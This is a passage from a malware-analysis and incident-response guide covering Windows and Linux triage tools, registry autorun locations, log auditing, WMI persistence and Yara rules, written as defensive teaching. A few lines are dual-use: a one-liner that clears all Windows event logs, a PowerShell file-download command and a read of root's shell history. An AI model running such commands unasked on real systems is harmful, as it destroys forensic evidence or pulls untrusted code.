      'Internet' related APIs and so on. API Monitor will
       only show us APIs from the group we select from
       this menu.
   2. This tab shows the processes being monitored for
       API calls. We can click the 'Monitor New Process'
       option to start monitoring a new process.
   3. This tab shows the API call, the Module, the
      Thread, Time, Return Value, and any errors. We
       can monitor this tab for APIs called by a process.
   4. This tab shows running processes that API Monitor
       can monitor.
   5. This tab shows the Parameters of the API call,
      including the values of those Parameters before and
       after the API calls.
   6. This tab shows the Hex buffer of the selected
       value.
   7. This tab shows the Call Stack of the process.
   8. Finally, this tab shows the Output.
In the below menu, we can select the Process from a
path, any arguments the process takes, the directory
from where we want to start the process, and the method
for attaching API Monitor. We can ignore the 'Arguments'
and 'Start in' options if the process takes no arguments
and we want to start it from the path where it is already
located.
Once we open a process, the tabs populate as described
below.
    In Tab 1, we see that we have selected all values so
    that we can monitor all the API calls.
    In Tab 2, we see the path of the process we are
    monitoring.
    In Tab 3, we see a summary of the API calls. The
    highlighted API call can be seen as RegOpenKeyExW.
    Hence we know that the process tried to open a
    registry key. We see that the API call returns an
    error, which we can see in the 'Return Value' field
    of this tab, and the error details can be found in this
    tab's 'Error' field.
     Tab 5 shows the parameters of the API call from
     before and after the API call was made.
     Tab 6 shows the selected value in Hex.
     Tab 7 shows the Call Stack of the process.
Dynamic Analysis with Process Explorer
Another excellent tool from the Sysinternals Suite is
Process Explorer. It might be viewed as a more
sophisticated version of the Windows Task Manager.
Process Explorer is a very effective tool that may be used
to spot masquerading and hollowing strategies used in
processes.
Process Explorer shows all the different processes
running in the system in a tree format. We can also see
their CPU utilization, memory usage, Process IDs (PIDs),
Description, and Company name. We can enable the lower
pane view from the 'View' menu to find more information
about the processes.
When we select a process in the upper pane, we can see
details about that process in the lower pane. Here, we
see the Handles the process has opened for different
Sections, Processes, Threads, Files, Mutexes, and
Semaphores. Handles inform us about the resources being
used in this process. If another process or a thread in
another process is opened by a process, it can indicate
code injection into that process. Similarly, we can see
DLLs and Threads of the process in the other tabs of the
lower pane.
For some more details about a selected process, we can
look at the properties of the process. We can do that by
right-clicking the process name in the process tree and
selecting 'Properties'.
Process Explorer can help us identify #Process-Hollowing
as well, via the 'Strings' tab in a process's properties.
At the bottom of the Strings tab are the options
'Image' and 'Memory'. When we select 'Image', Process
Explorer shows us strings present in the disk image of the
process. When 'Memory' is selected, Process Explorer
extracts strings from the process's memory. In normal
circumstances, the strings in the Image of a process will
be similar to those in the Memory as the same process is
loaded in the memory. However, if a    process has been
hollowed, we will see a significant difference between the
strings in the Image and the process's memory, showing us
that the process loaded in memory is vastly different
from the process stored on disk.
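That Image-vs-Memory comparison can be framed as a simple overlap score; the Jaccard metric and the idea of a threshold here are illustrative assumptions, not a feature of Process Explorer itself:

```python
def string_overlap(image_strings, memory_strings) -> float:
    """Jaccard overlap between the on-disk and in-memory string sets.
    A value near 1.0 is normal; a low value suggests the in-memory
    image differs greatly from the file on disk (possible hollowing)."""
    a, b = set(image_strings), set(memory_strings)
    if not a or not b:
        return 0.0
    return len(a & b) / len(a | b)
```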
Dynamic Analysis with Regshot
Regshot is a program that detects alterations to the
registry (and, optionally, the file system). It can be
used to determine whether registry keys were added,
removed, or changed by malware during our dynamic
analysis. Regshot takes a snapshot of the registry before
and after the malware has been executed and reports the
differences between the two.
In this simple interface, if we select the Scan dir1 option,
we can also scan for changes to the file system.
After this finishes we take the second shot
Once the second shot finishes, click on compare and this
will open a text file with the changes.
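Conceptually, the compare step is a set difference between the two snapshots. A minimal dict-based sketch of the idea (illustrative, not Regshot's actual implementation):

```python
def diff_snapshots(before: dict, after: dict) -> dict:
    """Compare two {key: value} snapshots the way Regshot's report
    does: keys added, keys deleted, and values modified."""
    added = sorted(after.keys() - before.keys())
    deleted = sorted(before.keys() - after.keys())
    modified = sorted(k for k in before.keys() & after.keys()
                      if before[k] != after[k])
    return {"added": added, "deleted": deleted, "modified": modified}
```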
Below we see the Date and time of the shots taken by
Regshot, the computer name, the Username, and the
version of Regshot. Below that, we can see a list of
changes that were made to the registry, starting from
Keys deleted.
Some malware can check all the running processes and
shut down if any analysis tool is running. When analyzing,
we might often encounter malware samples that check for
ProcExp, ProcMon, or API Monitor before performing any
malicious activity and quitting if these processes are
found. Therefore, these samples might thwart our
analysis efforts. However, since Regshot takes a shot
before and after the execution of the malware sample, it
does not need to be running during malware execution,
making it immune to this technique of detection evasion.
On the flip side, we must ensure that no other process is
running in the background while performing analysis with
Regshot, as there is no filtering mechanism in Regshot, as
we saw in the other tools. Hence, any noise created by
background processes will also be recorded by Regshot,
resulting in False Positives.
Malware Analysis Evasion
Techniques
The below are common techniques used by malware
developers to escape and thwart both static and dynamic
analysis
Packing and obfuscation
A packer is a tool to obfuscate the data in a PE file so
that it can't be read without unpacking it. In simple
words, packers pack the PE file in a layer of obfuscation
to avoid reverse engineering and render a PE file's static
analysis useless. When the PE file is executed, it runs the
unpacking routine to extract the original code and then
executes it.
You can tell if malware is packed by running strings or
pecheck: the strings output is often gibberish, and
pecheck will report that sections are packed and contain
executable parts.
Higher Entropy represents a higher level of randomness in
data. Random data is generally generated when the
original data is obfuscated, indicating that these values
might indicate a packed executable.
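Entropy is easy to compute directly. A small Python sketch of Shannon entropy in bits per byte; values near 8 suggest packed or encrypted data, while plain code and text usually score much lower:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data,
    approaching 8.0 for random (packed/encrypted) data."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())
```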
In a packed executable, the     SizeOfRawData will always
be significantly smaller than   the Misc_VirtualSize in
sections with WRITE and EXECUTE permissions. This is
because when the PE file unpacks during execution, it
writes data to this section, increasing its size in the
memory compared to the size on disk, and then executes
it.
The last important indicator of a packed executable we
discuss here is having very few import functions under
 IMAGE_IMPORT_DESCRIPTOR . These are often the only
imports of a packed PE file because they provide the
functionality to unpack the PE file at runtime.
Long sleep calls
The malware will not perform any activity for a long time
after execution. This is often accomplished through long
sleep calls. The purpose of this technique is to time out
the sandbox.
User activity detection
Some malware samples will wait for user activity before
performing malicious activity. This technique is designed
to bypass automated sandbox detection.
Footprinting user activity
Some malware checks for user files or activity, like if
there are any files in the MS Office history or internet
browsing history. If no or little activity is found, the
malware will consider the machine as a sandbox and
quit.
Detecting VMs
Virtual machines leave artifacts that can be identified by
malware. For example, some drivers installed in VMs
being run on VMWare or Virtualbox give away the fact that
the machine is a VM.
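One way malware footprints a VM is to look for hypervisor driver files on disk; the same check helps an analyst understand what gives a sandbox away. The driver paths below are common examples, not an exhaustive or authoritative list:

```python
import os

# Example driver artifacts left by common hypervisors (illustrative list)
VM_DRIVER_ARTIFACTS = [
    r"C:\Windows\System32\drivers\VBoxMouse.sys",  # VirtualBox additions
    r"C:\Windows\System32\drivers\VBoxGuest.sys",  # VirtualBox additions
    r"C:\Windows\System32\drivers\vmhgfs.sys",     # VMware shared folders
    r"C:\Windows\System32\drivers\vmmouse.sys",    # VMware pointing device
]

def present_vm_artifacts(paths=VM_DRIVER_ARTIFACTS):
    """Return the subset of known VM driver files present on this host."""
    return [p for p in paths if os.path.exists(p)]
```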
Malware Detection and Triage
The below notes help investigate and detect the presence
of malware on live systems; some of them can also be used
on a clone of an infected system.
Methodology
Process Analysis
Look at running processes by running Process
Explorer (GUI) and identify potential indicators of
compromise:
• Items with no icon
• Items with no description or company name
• Unsigned Microsoft images (First add Verified
Signer column under View tab->Select Columns,
then go to Options tab and choose Verify Image
Signatures)
• Check all running process hashes in VirusTotal
(Go to the Options tab and select Check
VirusTotal.com)
• Suspicious files are in Windows directories or
user profile
• Purple items that are packed or compressed
• Items with open TCP/IP endpoints
Signature File Check
Strings Check
• Right click on suspicious process in Process
Explorer and on pop up window choose Strings tab
and review for suspicious URLs. Repeat for Image
and Memory radio buttons.
• Look for strange URLs in strings
DLL View
• Open the DLL view with Ctrl+D
• Look for suspicious DLLs or services
• Look for no description or no company name
• Look at VirusTotal Results column
Stop and Remove Malware
• Right click and select Suspend for any identified
suspicious processes
• Right click and select Terminate on the previously
suspended processes
Clean up where malicious files Auto start on
reboot
• Launch Autoruns
• Under Options, Check the boxes Verify Code
Signatures and Hide Microsoft entries
• Look for suspicious process file from earlier
steps on the everything tab and uncheck. Safer to
uncheck than delete, in case of error.
• Press F5 to refresh Autoruns, and confirm the
malicious file has not recreated the malicious
entry in the previously unchecked autostart
location.
Process Monitor
• If malicious activity is still persistent, run
Process Monitor.
• Look for newly started process that start soon
after terminated from previous steps.
• Repeat as needed to find all malicious files and
processes, and/or combine with other tools and
suites.
Automated Malware Scanning
Linux
Using privilege escalation checkers
 wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/1_x/unix-privesc-check
 chmod +x unix-privesc-check
 ./unix-privesc-check > output.txt
chkrootkit
 apt-get install chkrootkit
 chkrootkit
rkhunter
 apt-get install rkhunter
 rkhunter --update
 rkhunter --check
Tiger
 apt-get install tiger
 tiger
 less /var/log/tiger/security.report.*
lynis
 apt-get install lynis
 lynis audit system
 more /var/log/lynis.log
Run Linux Malware Detect (LMD)
 wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
 tar xfz maldetect-current.tar.gz
 cd maldetect-*
 ./install.sh
Windows
With Anti Viruses
In Windows, you can use any of the available commercial
security solutions such as Kaspersky, Avira or Avast.
Windows Defender has also become quite capable of
detecting modern security threats.
Sysinternals Tools
Check for executables that are unsigned and open the
VirusTotal report
 sigcheck -e -u -vr [path]
Check exe's with bad signature and output them into a
CSV file
 C:\> sigcheck -c -h -s -u -nobanner path-to-
 scan > output.csv
List unsigned DLLs
 C:\> listdlls.exe -u
 C:\> listdlls.exe -u <PROCESS NAME OR PID>
Running offline malware scan
The below will run a scan using Windows Defender.
 C:\> MpCmdRun.exe -SignatureUpdate
 C:\> MpCmdRun.exe -Scan
Checking DLLs of a specific process
 C:\Windows\system32>tasklist /m /fi "pid eq
 1304"
Checking Autoruns
 C:\> autorunsc -accepteula -m
 C:\> type C:\Autoexec.bat
You can also check Autoruns, export them to a CSV file
and scan them with VirusTotal
 C:\> autorunsc.exe -accepteula -a -c -i -e -f
 -l -m -v
Analyzing startup processes and
autoruns
Windows
Places to look at to investigate startup processes
 Startups
 Run and Runonce in the registry editor
 Task scheduler
With wmic
 C:\> wmic startup list full
 C:\> wmic ntdomain list brief
By viewing the contents of the startup folder
 C:\> dir "%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\> dir "%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
C:\> dir "%userprofile%\Start Menu\Programs\Startup"
C:\> dir %ProgramFiles%\Startup\
C:\> dir "C:\Windows\Start Menu\Programs\Startup"
C:\> dir
"C:\Users\%username%\AppData\Roaming\Microsoft
\Windows\Start Menu\Programs\Startup"
C:\> dir
"C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup"
C:\> dir "%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup"
C:\> dir
"%ALLUSERSPROFILE%\Microsoft\Windows\Start
Menu\Programs\Startup"
 C:\> dir "%ALLUSERSPROFILE%\Start
 Menu\Programs\Startup"
Through wininit
 C:\> type C:\Windows\winstart.bat
 C:\> type %windir%\wininit.ini
 C:\> type %windir%\win.ini
With Sysinternal tools
 C:\> autorunsc -accepteula -m
 C:\> type C:\Autoexec.bat
You can also export the output to a CSV file
 C:\> autorunsc.exe -accepteula -a -c -i -e -f
 -l -m -v
With PowerShell
 Get-ScheduledTask
With Registry
 C:\> reg query HKCR\Comfile\Shell\Open\Command
 C:\> reg query HKCR\Batfile\Shell\Open\Command
 C:\> reg query HKCR\htafile\Shell\Open\Command
C:\> reg query HKCR\Exefile\Shell\Open\Command
C:\> reg query
HKCR\Exefiles\Shell\Open\Command
C:\> reg query HKCR\piffile\shell\open\command
C:\> reg query "HKCU\Control Panel\Desktop"
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Runonce
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunOnceEx
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunServices
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunServicesOnce
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Load
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Scripts
C:\> reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f run
C:\> reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f load
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\RecentDocs
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComDlg32\LastVisitedMRU
C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU /s
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\RunMRU
C:\> reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
C:\> reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Applets\RegEdit /v LastKey
C:\> reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs"
C:\> reg query "HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop"
C:\> reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\explorer\User Shell Folders"
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\explorer\Shell Folders"
C:\> reg query
HKLM\Software\Microsoft\Windows\CurrentVersion
\explorer\ShellExecuteHooks
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Browser Helper Objects" /s
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Runonce
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunOnceEx
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunServices
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunServicesOnce
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Winlogon\Userinit
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\shellServiceObjectDelayLoad
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks" /s
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows"
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows" /f Appinit_DLLs
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon" /f Shell
C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f Userinit
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts
C:\> reg query HKLM\SOFTWARE\Classes\batfile\shell\open\command
C:\> reg query HKLM\SOFTWARE\Classes\comfile\shell\open\command
C:\> reg query
HKLM\SOFTWARE\Classes\exefile\shell\open\comma
nd
C:\> reg query
HKLM\SOFTWARE\Classes\htafile\Shell\Open\Comma
nd
C:\> reg query
HKLM\SOFTWARE\Classes\piffile\shell\open\comma
nd
C:\> reg query
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\C
urrentVersion\Explorer\Browser Helper Objects"
/s
C:\> reg query
 "HKLM\SYSTEM\CurrentControlSet\Control\Session
 Manager"
 C:\> reg query
 "HKLM\SYSTEM\CurrentControlSet\Control\Session
 Manager\KnownDLLs"
 C:\> reg query
 "HKLM\SYSTEM\ControlSet001\Control\Session
 Manager\KnownDLLs"
Linux
In Linux, startup and autoruns can be investigated by
viewing the Cron jobs.
List Cron jobs
 crontab -l
List Cron jobs by root and other UID 0 accounts
 crontab -u root -l
Review for unusual Cron jobs
 cat /etc/crontab
 ls /etc/cron.*
Analyzing processes
Windows
Tools to analyze processes
 processhacker
 processmonitor
 processexplorer
Things to pay attention to
 1- Process running with wrong parent process.
 Example would be the authentication manager
 lsass.exe running as a child process of
 explorer.exe
 2- Process executable running from suspicious
 locations such as c:\temp or c:\users\
 3- Misspelled processes.
 4- Process with long command line containing
 weird or encoded characters and URLs.
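The first two indicators above can be scripted against a process listing. The expected-parent table is an assumption for illustration (on modern Windows, lsass.exe is normally started by wininit.exe), and the helper name is hypothetical:

```python
SUSPICIOUS_DIRS = ("c:\\temp", "c:\\users\\")      # locations from the text
EXPECTED_PARENTS = {"lsass.exe": "wininit.exe"}    # assumed typical parent

def flag_process(name: str, path: str, parent: str):
    """Apply the indicators above to one process record; return the
    list of reasons it looks suspicious (empty list if none)."""
    reasons = []
    if path.lower().startswith(SUSPICIOUS_DIRS):
        reasons.append("runs from suspicious location")
    expected = EXPECTED_PARENTS.get(name.lower())
    if expected and parent.lower() != expected:
        reasons.append(f"unexpected parent (expected {expected})")
    return reasons
```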
Linux
View processes
 ps aux
Get path of suspicious process PID
 ls -al /proc/<PID>/exe
Save file for further malware binary analysis
 cp /proc/<PID>/exe /malware.elf
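The same /proc lookup can be automated across all PIDs. A sketch (function name illustrative) that returns an empty mapping on systems without /proc and skips entries we lack privileges to read:

```python
import os

def list_proc_exes():
    """Map PID -> executable path via /proc/<pid>/exe symlinks.
    Kernel threads and unreadable entries are skipped."""
    results = {}
    try:
        entries = os.listdir("/proc")
    except OSError:
        return results  # not a Linux /proc system
    for entry in entries:
        if not entry.isdigit():
            continue
        try:
            results[int(entry)] = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue  # insufficient privileges or kernel thread
    return results
```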
View network interfaces
 ifconfig
View network connections
 netstat -antup
 netstat -plantux
View listening ports
 netstat -nap
View network routes
 route
View ARP table
 arp -a
List of processes listening on ports
 lsof -i
Analyzing Logs
Windows
With wevtutil.exe
Auditing Windows Event Logs from command line
Running it from the command line
 wevtutil.exe
requesting the help menu
 wevtutil.exe /?
You can start by copying the event logs into external log
files so that you can investigate them separately.
 C:\> wevtutil epl Security C:\<BACK UP
 PATH>\mylogs.evtx
 C:\> wevtutil epl System C:\<BACK UP
 PATH>\mylogs.evtx
 C:\> wevtutil epl Application C:\<BACK UP
 PATH>\mylogs.evtx
Auditing the application logs and returning 3 results,
descending order and text format
 wevtutil qe Application /c:3 /rd:true /f:text
Clear all logs
 PS C:\> wevtutil el | Foreach-Object {wevtutil
 cl "$_"}
With PowerShell
When analyzing events in Windows, we give special
consideration to the below events:
 Event ID 4624: successful authentication
 Event ID 4648: login attempt using alternate
 credentials (run as, for instance)
 Event ID 4672: super-user account login
We can investigate these event IDs with the below
powershell command
 PS> Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4624,4648,4672}
If we want to extract specific fields such as logged in
username, domain or remote workstation we need to
specify the field numbers in the command.
The below command does this for event ID [4624] and
exports the result to a [CSV] file
 Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4624} ` | Select-
 Object -Property timecreated, id,
 @{label='username';expression=
 {$_.properties[5].value}},
 @{label='domain';expression=
 {$_.properties[6].value}},
 @{label='Source';expression=
 {$_.properties[18].value}} ` | export-csv
 output_events_4624.csv
For every event ID, field numbers differ.
The below command extracts username, domain and
remote workstation for event ID [4648]
 Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4648} ` | Select-
 Object -Property timecreated, id,
 @{label='username';expression=
 {$_.properties[5].value}},
 @{label='domain';expression=
 {$_.properties[6].value}},
 @{label='Source';expression=
 {$_.properties[12].value}} ` | export-csv
 OUTPUT_events_4648.csv
The last one extracts username and domain fields for
event ID [4672]
 Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4672} ` | Select-
 Object -Property timecreated, id,
 @{label='username';expression=
 {$_.properties[1].value}},
 @{label='domain';expression=
 {$_.properties[2].value}} ` | export-csv
 output_events_4672.csv
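Since the property indices differ per event ID (5/6/18 for 4624, 5/6/12 for 4648, 1/2 for 4672 in the commands above), it helps to keep them in one lookup table. A hypothetical Python sketch of that mapping, applied to an already-parsed properties array:

```python
# Property indices used in the Get-WinEvent commands above; they vary per event ID.
EVENT_FIELDS = {
    4624: {"username": 5, "domain": 6, "source": 18},
    4648: {"username": 5, "domain": 6, "source": 12},
    4672: {"username": 1, "domain": 2},
}

def extract_fields(event_id, properties):
    """Pick the interesting fields out of an event's properties array."""
    layout = EVENT_FIELDS.get(event_id, {})
    return {name: properties[idx] for name, idx in layout.items()
            if idx < len(properties)}
```

The `properties` argument stands in for the `$_.properties[...]` array the PowerShell commands index into.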
Linux
Auditing authentication logs
 # tail /var/log/auth.log
 # grep -i "fail" /var/log/auth.log
Auditing User login logs in Ubuntu
 tail /var/
Auditing samba activity
 grep -i samba /var/log/syslog
Auditing Cron job logs
 grep -i cron /var/log/syslog
Auditing sudo logs
 grep -i sudo /var/log/auth.log
Filtering 404 logs in Apache
 grep 404 apache-logs.log | grep -v -E
 "favicon.ico|robots.txt"
Auditing files requested in Apache
 head access_log | awk '{print $7}'
View root user command history
 # cat /root/.*history
View last logins
 last
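The grep/awk pipelines above translate directly into a few lines of Python when you need counts rather than raw lines. A sketch (the log lines in the usage are made up) that filters 404s like the `grep -v` filter and tallies the requested path, i.e. awk's `$7`:

```python
from collections import Counter

def count_404_paths(lines):
    """Tally the request path (7th whitespace field) of 404 responses,
    ignoring favicon.ico and robots.txt noise."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        if len(fields) < 9:
            continue  # not a complete common-log-format line
        path, status = fields[6], fields[8]
        if status == "404" and path not in ("/favicon.ico", "/robots.txt"):
            counts[path] += 1
    return counts
```

Feeding it `open("access_log")` gives a quick ranking of which missing resources an attacker probed for.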
Hunting Based on File Search and
Processing
If you have hints about the malware's file size,
creation or modification date, extension or other
attributes, you can use file search commands to locate
malware artifacts.
Windows
Based on the extension
[1]
 C:\> dir /A /S /T:A *.exe *.dll *.bat *.ps1
 *.zip
[2] Below will do the same as above but specifying a date
which will list the files newer than the date used in the
command
 C:\> for %G in (.exe, .dll, .bat, .ps1) do
 forfiles -p "C:\" -m *%G -s -d +1/1/2023 -c
 "cmd /c echo @fdate @ftime @path"
Based on the name
 C:\> dir /A /S /T:A bad.exe
Based on date
Below will find   .exe   files after      01/01/2023
 C:\> forfiles /p C:\ /M *.exe /S /D +1/1/2023
 /C "cmd /c echo @fdate @ftime @path"
Based on date with Powershell
Below will return files that were modified past 09/21/2023
 Get-ChildItem -Path C:\ -Force -Recurse -
 Filter '*.log' -ErrorAction
 SilentlyContinue | where {$_.LastWriteTime -gt
 '2023-09-21'}
Based on the size.
Below will find files smaller than 50MB
 C:\> forfiles /S /M * /C "cmd /c if @fsize LEQ
 52428800 echo @path @fsize"
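The same size-based sweep can be scripted cross-platform. A Python sketch (the start path and threshold are placeholders you would adjust to the hints you have):

```python
import os

def files_smaller_than(root, max_bytes):
    """Walk root and yield (path, size) for files at or below max_bytes."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
            except OSError:
                continue  # file vanished or is unreadable
            if size <= max_bytes:
                yield path, size
```

Flipping the comparison to `size >= max_bytes` gives the larger-than variant of the forfiles command.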
Based on alternate data streams
[1]
 C:\> streams -s <FILE OR DIRECTORY>
Tool link
[2] With PowerShell
We can detect the use of ADS in an entire directory such
as    C:\
 Get-ChildItem -recurse -path C:\ | where {
 Get-Item $_.FullName -stream * } | where
 stream -ne ':$Data'
Common locations to store malware and trojans
 C:\Windows\Temp
 C:\TMP\
 C:\Windows\System32\
Display file content
 [1]
 get-content file
 [2]
 type file
Download a file over HTTP with Powershell
 (New-Object System.Net.WebClient)
 .DownloadFile("<URL>","C:\temp\<FILE NAME>")
Linux
List of open files
 lsof
List of open files, using the network
 # lsof -nPi | cut -f 1 -d " " | uniq | tail -n
 +2
List of open files on specific process
 # lsof -c <SERVICE NAME>
Get all open files of a specific process ID
 lsof -p <PID>
List of unlinked processes running
 lsof +L1
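`lsof +L1` surfaces these because a binary that keeps running after being deleted from disk leaves a dangling link; the same check can be made against `/proc` directly. A Python sketch (Linux-only, illustrative):

```python
import os

def unlinked_processes():
    """Return PIDs whose executable was deleted from disk after launch,
    a common malware trick to hide the binary."""
    hits = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue  # unreadable or already gone
        # The kernel appends " (deleted)" when the backing file was unlinked
        if target.endswith(" (deleted)"):
            hits[int(entry)] = target
    return hits
```

On a clean system this should come back empty; any hit is worth pulling the binary back out of `/proc/<PID>/exe` for analysis.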
Analyzing WMI Instances
Manually
WMI is [Windows Management Instrumentation] and it
uses event subscriptions and the Windows Query Language
[WQL] to perform system actions. It's used by attackers
to create backdoors that perform actions on the system.
WMI backdoors are created as a persistence mechanism
and need administrator privileges on the compromised
host.
When we investigate WMI instances, we look for [event
filters] and [event consumers]. Event filters specify
when the backdoor will run, such as at [time intervals] or
after [user login]. Event consumers are bindings to event
filters that execute a specific action, such as running a
process or connecting to a C2 server.
Retrieving WMI event filters and
consumers
 Get-WMIObject -Namespace root\Subscription -
 Class __EventFilter
This will get you the event filters along with their bindings
of event consumers
Retrieving bindings for a specific event
filter
 Get-WMIObject -Namespace root\Subscription -
 Class __FilterToConsumerBinding
[class] and [Namespace] are taken from the output of
the first query.
By taking a close look at the filters and the bindings you
can build a perception of whether there is a malicious WMI
instance.
With Autoruns
Using Autoruns from [Sysinternals] you can go to the
[WMI] tab and it will display all WMI instances along with
the location of any script, if any. See below figure
Hunting Malware with Yara
Yara is a pattern matching tool that can identify malware
based on patterns such as binary, hexadecimal or textual
strings. Malware, like any other program, stores textual
data which can be inspected with the [strings] tool.
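What `strings` does can be approximated in a few lines, which is handy when scripting triage. A Python sketch that pulls printable ASCII runs out of a binary blob:

```python
import re

def extract_strings(data, min_len=4):
    """Return printable ASCII runs of at least min_len bytes,
    roughly what the Unix strings tool prints by default."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len  # printable ASCII range
    return [m.decode("ascii") for m in re.findall(pattern, data)]
```

Running it over `open("sample.bin", "rb").read()` surfaces embedded URLs, paths and commands just like `strings sample.bin` would.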
Installing Yara
Through package manager
 sudo apt install yara
Manually
 wget
 https://github.com/VirusTotal/yara/archive/v4.0.2.tar.gz
 tar -xzf v4.0.2.tar.gz
 cd yara-4.0.2
 chmod +x bootstrap.sh
 ./bootstrap.sh
 chmod +x configure
 ./configure
 make
 sudo make install
Creating rules
When creating Yara rules, we store them in files called
[Yara rule files]. Every Yara command takes two
arguments: the [yara rule file] and the [name of the file
against which the yara rule file will run].
Yara rule files have the extension [.yar].
All yara rule files follow the example syntax below.
 rule examplerule {
   condition: true
 }
[examplerule] is the name of the rule and [condition] is
the condition.
The main sections of a Yara rule are below
 desc: used to summarise the objective of the
 yara rule. It doesn't influence the rule
 itself and is much like a comment in code.
 meta: reserved for descriptive information
 about the author of the yara rule
 strings: used to check for text or hexadecimal
 strings within files or programs
 condition: the logic that decides whether the
 rule matches
 weight
Example Yara Rule
 rule strings_checker {
         meta:
                 author = "motasem"
                 description = "test rule"
                 created = "11/10/2021 00:00"
         strings:
                 $hello_world = "Hello World"
                 $ext = ".txt"
         condition:
                 $hello_world and $ext
 }
The above rule matches files that contain both the string
[Hello World] and the string [.txt]. You can try this rule
against a directory
 yara -s strings-checker.yar /home/
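As a sanity check on what the rule would match, its logic (both strings must be present in the file content) can be emulated without yara installed. A Python sketch, not a substitute for yara itself:

```python
def rule_matches(path):
    """Emulates the example rule's condition: the file must contain
    both 'Hello World' and '.txt' somewhere in its bytes."""
    with open(path, "rb") as f:
        data = f.read()
    return b"Hello World" in data and b".txt" in data
```

Note that the `.txt` string is matched inside the file content, not against the file's extension.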
Automated yara rules creation
Automated creation of yara rules relies on providing
malicious files and malware samples as arguments to the
tool so that the tool scans the file for malicious strings
and adds them to a yara rule
YarGen
YarGen is a yara rule Generator.
 https://github.com/Neo23x0/yarGen
You can generate Yara rules by providing the malicious file
as an argument
 python3 yarGen.py --update
 python3 yarGen.py -m /path-to-malware-file.rar
 --excludegood -o /path-to-output-yara-rule-
 file
Valhalla
 https://www.nextron-systems.com/valhalla/
Yara scanners
Yara scanners are tools that scan for Indicators of
compromise based on ready made yara rules.
LOKI Yara Scanner
 https://github.com/Neo23x0/Loki
This scanner hunts for malwares based on [name], [yara
rule], [hash] and [C2 back connect]
 python loki.py -p [path to be scanned]
Useful modules for malware analysis
The below modules can be used to generate yara rules
that hunt for specific characteristics related to malware
Python pefile
 pip install pefile
Cuckoo sandbox
 https://cuckoosandbox.org/
Resources for Yara rules
 https://github.com/InQuest/awesome-yara
